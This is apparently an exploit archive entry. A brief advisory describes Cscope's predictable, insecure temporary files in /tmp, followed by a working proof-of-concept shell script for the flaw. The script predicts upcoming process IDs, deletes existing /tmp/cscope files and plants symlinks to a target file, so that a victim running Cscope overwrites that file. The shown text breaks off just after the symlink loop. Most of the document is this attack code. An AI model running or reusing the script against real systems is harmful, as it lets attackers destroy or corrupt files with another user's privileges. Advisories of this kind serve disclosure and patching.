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source: https://www.securityfocus.com/bid/11697/info
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Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it.
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During execution, the utility reportedly creates temporary files in the system's temporary directory, '/tmp', with predictable names. This allows attackers to create malicious symbolic links that Cscope will write to when an unsuspecting user executes it.
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Attackers may leverage these issues to overwrite arbitrary files with the privileges of an unsuspecting user that activates the vulnerable application.
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Versions up to and including Cscope 15.5 are reported vulnerable.
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#!/bin/sh
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#################################################################
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# RXcscope_proof.sh
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# brute force case baby
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# cscope advisory and exploit by Gangstuck / Psirac <research@rexotec.com>
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#################################################################
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HOWM=30
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CURR=`ps | grep ps | awk '{print $1}'`
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NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1`
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LAST=`expr $NEXT + $HOWM`
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echo -e "\n--= Cscope Symlink Vulnerability Exploitation =--\n"\
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" [versions 15.5 and minor]\n"\
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" Gangstuck / Psirac\n"\
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" <research@rexotec.com>\n\n"
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if [ $# -lt 1 ]; then
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echo "Usage: $0 <file1> [number_of_guesses]"
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exit 1
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fi
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rm -f /tmp/cscope*
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echo "Probed next process id ........ [${NEXT}]"
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while [ ! "$NEXT" -eq "$LAST" ]; do
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ln -s $1 /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1`
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ln -s $1 /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1`
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done |